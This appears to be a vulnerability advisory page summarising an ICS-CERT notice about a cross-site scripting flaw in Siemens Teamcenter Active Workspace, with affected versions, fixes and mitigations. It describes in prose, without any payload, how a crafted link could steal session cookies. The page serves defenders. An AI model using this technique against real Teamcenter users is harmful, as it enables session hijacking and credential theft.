OTPulse
FeedAboutContact

Siemens Teamcenter Active Workspace

Monitor6.1ICS-CERT ICSA-22-167-15Jun 14, 2022
Attack VectorNetwork
Auth RequiredNone
ComplexityLow
User InteractionRequired
Summary

Teamcenter Active Workspace V5.2 (before 5.2.9) and V6.0 (before 6.0.3) contain a cross-site scripting (XSS) vulnerability. An attacker can inject malicious scripts into the application that execute in the context of a user's browser session. The vulnerability requires user interaction—the victim must click a crafted link—and could allow session hijacking or credential theft.

What this means
What could happen
A remote attacker could inject malicious scripts into Teamcenter Active Workspace to steal user session data or credentials when an authorized user views a crafted link, compromising access to the product lifecycle management system.
Who's at risk
Engineering and design organizations using Siemens Teamcenter Active Workspace for product lifecycle management. This includes automotive, manufacturing, aerospace, and industrial equipment design teams who rely on the application for collaborative product data and design workflows.
How it could be exploited
An attacker crafts a malicious URL containing JavaScript payload and sends it to an authorized Teamcenter user (via email, chat, or social engineering). When the user clicks the link in their browser, the script executes in their session context, allowing the attacker to capture their authentication token or session cookie.
Prerequisites
  • User must be authenticated to Teamcenter Active Workspace
  • User must click a malicious link crafted by the attacker
  • User's web browser must not have XSS filtering enabled or the filter must be bypassed
remotely exploitablerequires user interactionlow complexityaffects PLM system access control
Exploitability
Low exploit probability (EPSS 0.5%)
Affected products (2)
2 with fix
ProductAffected VersionsFix Status
Teamcenter Active Workspace V5.2<V5.2.95.2.9
Teamcenter Active Workspace V6.0<V6.0.36.0.3
Remediation & Mitigation
0/4
Do now
0/1
WORKAROUNDEnsure all user web browsers have XSS filtering mechanisms enabled
Schedule — requires maintenance window
0/2

Patching may require device reboot — plan for process interruption

Teamcenter Active Workspace V5.2
HOTFIXUpdate Teamcenter Active Workspace V5.2 to version 5.2.9 or later
Teamcenter Active Workspace V6.0
HOTFIXUpdate Teamcenter Active Workspace V6.0 to version 6.0.3 or later
Long-term hardening
0/1
HARDENINGRestrict network access to Teamcenter Active Workspace using firewall rules, allowing connections only from approved engineering and design workstations
View full CISA ICS-CERT advisory
↑↓ Navigate · Esc Close
API: /api/v1/advisories/4ed1dddc-fb14-495e-ad49-b32bc28adf66
Siemens Teamcenter Active Workspace | CVSS 6.1 - OTPulse